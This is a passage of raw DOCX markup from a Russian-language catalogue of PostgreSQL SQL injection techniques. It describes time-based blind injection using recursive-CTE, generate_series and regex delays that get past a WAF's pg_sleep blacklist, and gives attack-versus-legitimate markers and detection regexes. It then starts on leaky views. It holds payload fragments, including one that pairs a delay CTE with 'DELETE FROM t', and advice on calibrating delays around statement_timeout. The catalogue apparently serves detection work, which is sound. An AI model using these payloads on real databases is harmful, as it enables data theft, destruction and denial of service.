        <w:t xml:space="preserve"> доступны всем; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>crypt</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gen_salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — требует extension pgcrypto (см. 3.8.4 для проверки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3AFEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`statement_timeout`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: если установлен &lt; calibrated delay — payload падает; атакующий калибрует под лимит. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Если не установлен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт) — recursive CTE с большим N может продолжаться часами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10CD94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`work_mem`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`temp_file_limit`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> влияют на скорость, но не на принципиальную возможность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB4CE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично. RDS / Cloud SQL / Supabase не блокируют CTE-recursion; statement_timeout у них обычно установлен в 30s–60s по дефолту, что даёт атакующему запас для калибровки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B22537" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A8D04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recursive CTE и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — частые в reporting и hierarchical-query коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10AAB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hierarchical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE tree AS (SELECT id, parent_id FROM nodes WHERE id=1 UNION ALL SELECT n.id, n.parent_id FROM nodes n JOIN tree t ON n.parent_id=t.id) SELECT * FROM tree</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49722DA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT day::date FROM generate_series('2026-01-01', '2026-12-31', '1 day'::interval) day</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D8322" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Number ranges</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO t SELECT i, 'val' FROM generate_series(1, 100) i</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC7CAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Маркеры атаки vs легитимного использования:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837E411" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N в payload</w:t>
      </w:r>
      <w:r>
        <w:t>: legitimate использование — N до 10000 (макс reasonable depth), N=100M — почти всегда атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43355D9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Контекст в WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: legitimate CTE — обычно top-level (SELECT FROM cte WHERE ...); CTE в WHERE-clause </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT count(*) FROM (WITH RECURSIVE ...) ) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нелегитимный паттерн, индикатор atomic-delay-injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7154DFB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запись с recursive CTE и большим constant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — анти-паттерн legitimate-кода (они обычно параметризованы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60168814" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP-RTT distribution</w:t>
      </w:r>
      <w:r>
        <w:t>: legitimate-эндпоинт имеет узкое распределение RTT (median ~10-50ms); time-based-эндпоинт показывает bimodal distribution: 10ms (false-branch) или 3-5s (true-branch). Сигнал заметен в P99-метриках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F4DFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FE43C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.4 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые) — recursive CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3BF44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.1+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series(timestamp, timestamp, interval)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (date-version).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBD7C01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 15+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обновлённый regex-engine (Henry-Spencer fork), всё ещё уязвим к catastrophic backtracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B0635" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773A02E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E6E74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 (Time-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — главный потребитель 3.10.2. 3.4 предполагает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как примитив; 3.10.2 даёт альтернативу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E300877" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.0 (WAF в 3.9-категории)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явно в blacklist. 3.10.2 — обход именно этого фильтра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C1C381" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 (Data-modifying CTE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо: CTE с DML внутри recursive — расход CPU + write-эффект в одной операции (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH RECURSIVE r AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;1M), del AS (DELETE FROM t RETURNING 1) SELECT count(*) FROM r, del</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B75F286" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.3 (Leaky views)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — recursive CTE может усиливать leak через repeat-call к leaky-функции в каждой итерации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E5BD2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE-альтернатива time-based: вместо oracle через delay, целевая RCE; не пересекаются по semantic, но обе требуют 3.9-обходов в WAF-окружениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76970730" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> регекса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bWITH\s+RECURSIVE\b.*?\b\d{6,}\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (recursive с N≥10^6) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. сводный regex категории 3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>summary-3.10.md</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBC436" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A30430" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Recursive Queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — спецификация recursive CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E48498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Set Returning Functions — generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in для CPU-bound delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFAF49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: pgcrypto — crypt, gen_salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bcrypt-based delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B444DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP: ReDoS — Catastrophic backtracking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основа для Payload C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C26E63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — blind time delays without pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст альтернативных delay-примитивов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18118F54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4484D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.10.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346BA6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A6BDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">«Leaky views» — класс уязвимостей PostgreSQL, когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дешёвая</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функция или оператор, поданный атакующим в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-клаузу запроса к view, исполняется планировщиком </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHERE-фильтра самой view. Это позволяет атакующему вызвать leaky-функцию на строках, которые view должна была скрыть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB90B0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита PG — атрибут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для view (доступно с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), который запрещает планировщику push-down дешёвых функций через view-границу. Защита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по умолчанию выключена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t>) — потому что включение часто ломает performance legitimate-запросов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9BEAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CTE играет роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>контролёра plan-shape</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44BB3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH x AS (SELECT * FROM view) SELECT * FROM x WHERE leaky(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG ≤ 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTE всегда материализован (фенс), leaky() гарантированно после view-фильтра — leak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>невозможен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даже без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF8BBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 12+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTE inlined по умолчанию (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
